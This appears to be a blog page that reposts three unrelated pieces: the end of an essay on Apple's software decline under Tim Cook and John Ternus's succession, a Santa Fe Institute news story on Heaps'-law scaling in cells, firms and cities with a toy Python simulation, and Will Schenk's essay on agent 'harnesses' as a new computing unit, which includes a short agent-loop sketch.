Yes, I know. Apple under Steve wasn’t perfect. MobileMe happened. Antennagate happened. The hockey-puck mouse happened. Plenty of bad calls happened. Nobody is arguing for some flawless golden age that didn’t actually exist.

The argument is about standards, not perfection. Old Apple shipped mistakes too, and it visibly hated them. The bad release, the launch-day disaster, the public mea culpa, the engineering re-org. The whole company would visibly recoil and try to do better.

Today’s Apple ships friction and treats it like background radiation. That’s not the same thing.

The Counter Argument (-ish)

Yes, Apple Silicon is incredible. Yes, the Watch saved lives. Yes, the iPhone got better cameras and better screens and better batteries. The hardware story under Cook is strong, and pretending otherwise would be silly.

But here’s the thing about hardware. You can grow it through operational discipline. You can squeeze a process node, you can negotiate a better deal with TSMC, you can lean on a thousand suppliers until they bend. That’s exactly the kind of work Cook is good at, and it’s exactly the kind of work that doesn’t require a product person at the top.

Software is different. Software lives or dies on judgment calls a thousand times a day. Should this preference go in this menu or that one? Should this notification fire silently or with a sound? Should this Bluetooth handoff be aggressive or conservative? Those decisions can’t be operationally optimized. They have to be made by someone who actually uses the thing and has an opinion. Cook is famously not that person.

And the rot follows that exact line. Apple’s hardware reviews are still glowing. Apple’s software reviews… are not. The number of “I’m switching to Linux” or “I’m switching back to Windows” essays from longtime Apple loyalists has gone from a trickle to something that should worry someone on Apple Park’s executive row.

The grumbling isn’t about features. It’s about the texture of using the products. Which is the thing Steve cared about most, and Cook seemingly cares about least.

The Era of *aaS

There’s a related thread here. Cook’s Apple has gradually rebuilt itself as a services company that happens to make hardware. iCloud subscriptions. Apple Music. Apple TV+. Apple Arcade. Apple Fitness+. Apple News+. Apple One. AppleCare+ tiers within tiers. The recurring monthly nudges that show up in apps that used to be one-and-done.

There’s a real argument that this was a defensive move, and it worked. The Services line is now bigger than the GDP of small nations. But there’s also a reason long-time Apple users are uneasy. The company that ran the iPod silhouette ad is now the company that nudges you to try Apple Fitness+ when you open the Watch app for an unrelated reason. The texture changed. The thing that made Apple feel different is, slowly, less different.

And here’s where it loops back to the bug list. When recurring revenue becomes the thing the company optimizes for, the tolerance for friction goes up. A slightly annoying subscription upsell is acceptable as long as the funnel still works. A weird Settings menu is acceptable as long as nobody actually leaves. That’s how product standards quietly erode. Not through one dramatic bad decision, but through a thousand tolerated ones.

Was that the right business call? Maybe. Was it the right product call? Different question. And it’s the question Steve would have asked.

Enter John Ternus

The honest read on Cook’s tenure: he was the right operations CEO for the post-Steve transition, and he stayed long enough to also become the wrong product CEO for the post-iPhone era. That’s not a damning legacy. It’s just a long career with two halves that needed different people.

So who’s getting handed the keys? John Ternus.

If you needed to pick someone inside Apple to course-correct away from the operations-CEO failure mode, Ternus is the right person on paper. He’s been SVP of Hardware Engineering for years. He came up working on the Mac, ran iPad development, and was a key player in the Apple Silicon transition. He’s the one Apple keeps putting on the keynote stage to talk about new hardware. By any honest read, he’s an engineer and a product person, not a salesperson, not an operator. That’s the pick Steve would have nodded at.

BUT…

The piece I just spent a thousand words complaining about isn’t a hardware problem. Apple’s hardware under Cook has been excellent. The thing that rotted is the software experience. The bug list. And Ternus, for all his strengths, has spent his career running hardware, not software. Whether his product instincts translate into fixing the software stack is the open question of his tenure.

The hopeful read is that an engineer-CEO will demand engineering rigor across the whole company, including from the software org that’s been getting away with shipping half-baked work for a decade. The cynical read is that hardware engineers and software engineers are different cultures, and you can lead one without knowing how to fix the other.

I’m cautiously in the hopeful camp. The fact that Apple chose a builder over another finance type or another operations type says they noticed the thing this article is about. That’s not nothing.

But the proof is going to be in the next macOS release. Does System Settings get rebuilt? Does AirPods routing finally stabilize? Does Mail get a rewrite? Do notifications get a coherent strategy across all four operating systems? If yes, this was the right pick. If we get another year of shiny new features with five new bugs and zero fixes for the old ones, then Apple just rearranged the deck chairs.

Because that’s what made Apple. The rest is supply chain.

So yes. Tim Cook is leaving. Good. And John Ternus is taking the keys at exactly the moment Apple needs to remember what it was supposed to be.

How function diversity scales, from cells to companies

Mike's Notes

Fascinating work. Something to test Pipi against using long-cycle simulations.

Resources

References

  • Scaling laws for function diversity and specialization across socioeconomic and biological complex systems. Authors: Vicky Chuqiao Yang, James Holehouse, Hyejin Youn, José Ignacio Arroyo, Sidney Redner, Geoffrey B. West, and Christopher P. Kempes. PNAS (February 12, 2025). DOI: 10.1073/pnas.2509729123

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Parallax
  • Home > Handbook > 

Last Updated

04/05/2026

How function diversity scales, from cells to companies

By: Santa Fe Institute
Parallax: 18/02/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

A mystery novel, a history book, and a fantasy epic may have little in common in plot or style. But count the words inside them and a strange regularity appears: many new words show up early, then fewer and fewer as the author reuses what has already been introduced.

That pattern, known as Heaps’ law, turns out not to belong to books alone. A new study in PNAS finds that the same rule also describes the growth patterns in many complex systems, from living cells and corporations to universities and government agencies — and could even be used to predict how they will change in the future.

The study, led by scientists at the Santa Fe Institute and MIT, doesn’t just document this regularity; it introduces a mathematical model that quantifies how different systems diversify and specialize. It finds that, while systems vary in how much they invest in creating entirely new functions, once those functions exist, their subsequent growth follows a remarkably universal rich-get-richer process.

“What’s striking is that these systems weren’t designed to follow the same rules,” says SFI Program Postdoctoral Fellow James Holehouse, who co-led the study with Vicky Chuqiao Yang, a former SFI Omidyar Fellow now at MIT. “Yet when you look at how they grow, you see the same trade-off between adding something new and building on what already exists.”

In the study, researchers focus on what they call “distinct functions” — the different kinds of work a system performs. In a cell, that might mean different proteins. In an organization, it could mean different kinds of jobs. As systems grow, they do add new kinds of work, but they do so more and more slowly over time.

Using their model, the team analyzed dozens of bacterial and microbial cells, more than a hundred U.S. federal agencies, thousands of companies and universities, and hundreds of metropolitan areas. Across most of these cases, the same pattern appeared: as systems got bigger, the pace at which they added new functions steadily slowed, growing sublinearly.

In practical terms, sublinear growth means that doubling the size of a system does not double the number of functions inside it. Instead, growth increasingly comes from expanding what already exists. A growing organization hires more people into established jobs before creating new titles. A cell produces more of the proteins it already uses instead of evolving entirely new ones.
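The sublinear pattern is easy to see in a toy simulation. The sketch below is my own illustration, not the model from the paper: items are drawn from a heavy-tailed, rich-get-richer (Zipf) population, and the number of distinct types seen so far is recorded as the system grows. All parameter values here are assumptions chosen for the demo.

```python
import random

def heaps_curve(total_draws, vocab=100_000, zipf_s=1.2, seed=0):
    """Draw items from a Zipf-distributed (rich-get-richer) population and
    record how many *distinct* items have appeared after n draws.

    Sampling from a heavy-tailed distribution reproduces Heaps'-law-style
    sublinear growth: frequent items get reused, so genuinely new types
    arrive more and more slowly as the system grows.
    """
    rng = random.Random(seed)
    # unnormalised Zipf weights over ranked items: weight(rank) = rank**-s
    weights = [1.0 / (rank ** zipf_s) for rank in range(1, vocab + 1)]
    draws = rng.choices(range(vocab), weights=weights, k=total_draws)
    checkpoints = {1000, 2000, 4000, 8000}
    seen, curve = set(), {}
    for n, item in enumerate(draws, start=1):
        seen.add(item)
        if n in checkpoints:
            curve[n] = len(seen)
    return curve

curve = heaps_curve(8000)
```

With these assumed parameters the distinct-type count keeps rising, but the ratio between successive doublings stays below 2, which is the signature of sublinear growth.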

“It is remarkable that cells, bureaucracies, and companies, despite obvious differences, all grow their function repertoire with a similar pattern,” says Yang, an assistant professor at MIT Sloan and the Institute for Data, Systems, and Society. “This suggests that the regularity discovered in Heaps’ law applies not only to what humans create, like books, but also to human organizations themselves.”

Cities, however, follow a different version of the same trend. They still add new kinds of jobs as they grow, but they do so much more slowly, following a logarithmic pattern rather than the power-law pattern seen in other systems. Even as populations soar, genuinely new job types become increasingly rare.

That difference reflects a deeper structural divide. Cells, firms, and agencies behave like organisms, with clear boundaries and unified goals. Cities, by contrast, resemble ecosystems shaped by the independent choices of individuals rather than centralized control.

Geoffrey West, a co-author and Santa Fe Institute Shannan Distinguished Professor, adds, “There are underlying regularities shaping how complexity builds, even in systems that look completely different on the surface.”

This material is based upon work supported by the U.S. National Science Foundation under Award No. 2526746

The Neural Harness: The new CPU

Mike's Notes

Some deep insights here from Will Schneck. Asking more questions than he answers. Especially deterministic vs probabilistic. Where does emergence emerge? 😎😎

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > The Focus AI
  • Home > Handbook > 

Last Updated

03/05/2026

The Neural Harness: The new CPU

By: Will Schenk
The Focus AI: 01/05/2026

I am a father, entrepreneur, technologist and aspiring woodsman.

My wife Ksenia and I live in the woods of Northwest Connecticut with our four boys and one baby girl. I have a lumber mill and all the kids love using the tractor.

I’m currently building The Focus AI, Umwelten, and Cornwall Market.

"Coding agents will build their own tools and their own agents. Agents will be used by non-engineers to manage other agents to manage parts of the org chart."


I'm on my second Claude Max plan. That's in addition to Cursor, Codex, Gemini, and a healthy Amp habit. Not to mention a Jetson AGX Thor I'm about to plug in at the office — more on that one later.

Overnight jobs parsing financial deal structures, ops stuff, research, monitoring logs, responding to events, all the little background things. The first plan tapped out, I added another, that one tapped out too, and now I'm provisioning a third the way you'd add a build runner. Mundane.

A new entry in an old list

Look at the paragraph I just wrote. Overnight jobs parsing financial deal structures, ops stuff, research, monitoring logs, responding to events. Half of those words are themselves names of native units of computing. Logs — log aggregators. Events — event streams. Research — search indexes. Ops — schedulers, orchestrators, deployment systems. Jobs — queues. The lede is already a list of older units I'm wiring into.

Computing has been accreting native units forever, and the way you build the next layer is by composing the units underneath it.

You combine adders and accumulators to make a CPU. You combine CPUs and memory and a bus to make a machine. You combine logic gates and clocks to make registers. You combine Boolean functions and a process model to make an operating system. You combine lexers and parsers and code generators to make a compiler. You combine source files and a compiler to make a program. You combine programs and a network stack to make a service. You combine services and a database to make an application. You combine applications and a queue to make a pipeline. You combine pipelines and a stream processor to make a real-time system. You combine streams and a log aggregator to make observability. You combine logs and a metric and an anomaly model to make a monitor. You combine all of it and a scheduler and you have a system that runs without you watching it.

[Image: flat-color treemap of the computing stack — small blocks for adders, clocks, registers, CPU, memory, and bus growing diagonally up and to the right through machine, OS, compiler, program, service, application, pipeline, stream, observability, and monitor, culminating in a large block for scheduler.]

Each layer is just the layer below, composed. That's what a native unit is — the thing you stop writing yourself, the thing you wire to. You don't write a compiler. You don't write a Postgres. You don't write a Kafka or a Kubernetes or a Lucene or a git. You pick the unit, you combine it with other units, you build on top.

Now look at that list again. Everything on it is sitting on top of Boolean logic. Silicon, gates, arithmetic, state machines, if/then. Numbers, types, queries, schedules, indexes — all of it is deterministic logic resolving down to ones and zeros. You can climb that stack pretty high, but you don't get out of it.

[Image: 19th-century geological cross-section — layered strata of fossilized circuit traces (gates, clocks, registers, CPU, OS, compiler, program, service, application) opening into a newly excavated neural floor below, neuron tendrils threading up into the rock. The new floor under the old stack.]

Neural nets aren't more of that. They're a different kind of logic. Pattern, association, similarity, fuzzy matching, generation. The thing silicon-and-Boolean was bad at, that we kept failing to solve with cleverer rules, the neural net does natively. We added a new floor — GPUs, TPUs, the Cerebras inference fabric, the Jetson on my desk — and a new kind of computation running on it that doesn't reduce to if A and B then C.

By themselves these things predict tokens. They don't loop, they don't read files, they don't remember. To get computation out of one you wrap it. A loop, some tools, file access, a shell, a way to manage context. That wrapper is the harness. The harness is the unit that turns "predicts the next token" into "does the work" — and lets the new kind of logic compose with the old kind.
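That shape can be sketched in a few lines. This is my own minimal toy, not how any particular product is implemented; `call_model` stands in for whatever model API you wire in, and the tool names are placeholders.

```python
import subprocess

def harness(task, call_model, tools, max_steps=10):
    """A minimal neural-harness loop.

    `call_model` is any function from the message list to a reply dict:
    either {"tool": name, "args": ...} to request a tool, or
    {"content": text} to finish. The harness supplies the loop, the
    tools, and the accumulating context.
    """
    messages = [{"role": "user", "content": task}]
    for _ in range(max_steps):                       # the loop
        reply = call_model(messages)
        tool = reply.get("tool")
        if tool in tools:                            # the tools
            result = tools[tool](reply["args"])
            # feed the tool result back into the context
            messages.append({"role": "tool", "content": str(result)})
        else:
            return reply.get("content", "")          # model is done
    return "step limit reached"

# An example tool table: file access and a shell, as described above.
TOOLS = {
    "read_file": lambda path: open(path).read(),
    "run_shell": lambda cmd: subprocess.run(
        cmd, shell=True, capture_output=True, text=True
    ).stdout,
}
```

Swapping `call_model` between a hosted API and a local model changes nothing else, which is exactly why the harness, not the model, is the unit.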

The neural harness is to neural nets what the compiler was to source code. New entry on the list, joining the family rather than replacing it. The work I'm running on these two-going-on-three Max plans is mostly the harness wiring into the older units — tailing logs, querying state, watching streams, kicking off jobs, hitting indexes. New unit, old units, composed.

That's why the second Max plan isn't weird. The bill scales with how much work you're doing in the new unit. I'm doing a lot of work in the new unit.

How it shows up in a day

It really has stopped being a tool I reach for; it's just the tool.

When I'm coding, I'm in a harness. When I'm reading a PDF I needed to read anyway, the harness is the thing reading it. Operations folder — SOWs, invoices, content ideas, project status — that's a harness. Parsing 20 financial deal docs and writing me a summary while I sleep — harness. Family infographics, fasting tracker, Oura Ring trends — harness, harness, harness. Different work, same unit.

[Image: small-multiples grid — the same harness icon repeated across sixteen everyday domains: code editor, PDF reading, invoice, SOW draft, content ideas, project status, financial deal, overnight job, log monitor, email triage, family infographic, fasting tracker, Oura trends, calendar, research note, ops dashboard. One unit, many domains.]

Coding was just the first place this paid off, because the feedback loop is tightest. Compile or don't, test or don't, the world tells you you're wrong inside a second. So that's where the harness got tuned first. That's why the unit is called a "coding agent" right now. But "coding" is vestigial. The thing isn't a coding agent. It's a harness around a model, and what runs in it is whatever you have tools for.

Rick Blalock said it at AI Engineering Miami — coding agent as universal software primitive. A 60-year-old in Texas replaced a $10k/month HubSpot bill by pointing one of these at the problem for three months. A 24-year-old window cleaner in Florida runs marketing, sales, and estimating off the same primitive. Both of them bought Mac Minis. Tim Cook didn't have that on his bingo card.

The model question is below the harness question

Here's something I noticed about my own behavior: I'm mainly on Claude. Have been for months. I dip in and out of GPT and Grok and Gemini, but just sort of end up back here. Not because I reasoned out a model strategy — because Claude Code defaults to it and now I'm on Opus all day every day. Amp has its opinion and I try to set Cursor to super max mode, but really the model picked itself by way of the harness picking it for me.

So the perennial "Opus vs GPT-5 vs Gemini 3" argument is pitched one floor below where the action is. It's not model-vs-model. It's harness-with-default-model vs other-harness-with-default-model. The harness drives the model choice, often without telling you.

And underneath that, there's a whole zoo. Frontier reasoning models. Cheap fast models. Code-specific fine-tunes. Local models that run on the GPU you already own. Cerebras-fast inference at 1,200 tokens/sec, a different regime entirely. And the inside-the-harness thing: Tejas Bhakta at Miami called it "everything is models" — a compaction model running every two seconds, a code-search model at 80k tokens/sec, a frontier model doing only the heavy reasoning, all stitched together. Software 3.5, he called it. The harness picks all of that for you, or doesn't, depending on which harness.

[Image: Da Vinci anatomical plate — a single mechanical harness apparatus labeled HARNESSIS — UNITAS SUPERIOR with four tool attachments (LEGERE, SCRIBERE, IMPERARE, ITERARE), above a labeled menagerie of seven model "species": Frontier, Velox, Codicis, Localis, Compactionis, Quaerens, Cerebras.]

Which means the harness is a model strategy. Picking a harness on purpose means picking which models do which jobs inside it.
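One way to picture that claim is a routing table the harness owns, mapping job kinds to model classes. The sketch below is hypothetical — the job names and model names are placeholders, not any product's real configuration — but it shows the shape of a model strategy made explicit:

```python
# Hypothetical routing table: the harness, not the user, decides which
# model class handles which kind of job. All names are placeholders.
ROUTES = {
    "compact_context": "small-fast-model",   # runs constantly, must be cheap
    "search_code":     "code-tuned-model",   # throughput matters most
    "reason":          "frontier-model",     # heavy reasoning only
}

def pick_model(job_kind):
    """The harness's model strategy as a lookup: pick by job, not by brand.
    Unknown job kinds fall back to the frontier model rather than failing."""
    return ROUTES.get(job_kind, ROUTES["reason"])
```

Choosing a harness deliberately means choosing, or at least inspecting, this table.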

So which harness?

A separate post coming soon — each one deserves its own treatment and the conversation moves week to week. The shape of it:

  • You can build your own in a weekend. About 50 lines gets you the loop. Highly recommend, even if you never use it.
  • Claude Code is the one everyone uses, and — by Anthropic's own model on Anthropic's own benchmark — the worst Claude harness on offer. (Niels Rogge posted Terminal-Bench 2: same Opus 4.6, Claude Code last, ForgeCode and Capy at 70-75%. Twenty-five points of accuracy from picking a different harness.)
  • Picode is Mario Zechner's minimal, self-modifying one — four tools, the agent writes its own extensions, hot-reloads in the session. The most fun one to play with right now.
  • Amp is the one I'm most fascinated with — though to be clear, I'm editing this post in Cursor. The multimodel thing actually works now. In January I wrote that Amp "should be better, but, you know, isn't." Four months later: it is.

[Image: horizontal bar chart of Terminal-Bench 2 scores on the same Opus 4.6 — ForgeCode 74%, Capy 71%, Picode 62%, Amp 55%, Claude Code 49%. Annotation: a 25-point gap from picking a different harness.]

The point of this post is the unit, not the catalog.

What I'm still circling

[Image: Da Vinci notebook spread with marginalia — a Jetson AGX Thor on a small workbench labeled MACHINA LOCALIS, a brass token-cost gauge labeled STIPENDIUM TOKEN — quanto?, a half-configured harness labeled HARNESSIS CONFIGURATA — UNITAS NAVIS?, and a small rising-line chart labeled LINEA NOVA IN STATU FINANCIALI.]

What's the unit of shipping? Ben Davis's claim in Miami was that it's becoming a directory of skill files plus a coding-agent runtime. That feels right. But the runtime is also moving — Picode's bet is that it should be malleable inside the session, so you can't pin it. Maybe the unit is even smaller. Maybe the unit is the harness, configured.

What about the Jetson on my desk. The other thing the bill is about to teach us is that some of this work shouldn't be paying a subscription at all. Local models on local hardware — gpt-oss, Qwen, MiniMax, whatever's frontier-enough for the job — running on the GPU you already own, or the Jetson, or the laptop. Cheap as electricity. No data leaving the building. The harness doesn't care which model it's calling. The bill cares a lot. I think a real chunk of what's running on the second Max plan ends up local by the end of the year.

When the bill becomes a real line item — and it will — what does that conversation sound like? "Cloud spend" took ten years to become its own column on the financial statement. "Token spend" might take less. We're paying for a unit of computation, not for software. Different shape entirely.

I'll get the third Max plan tomorrow. There's another job.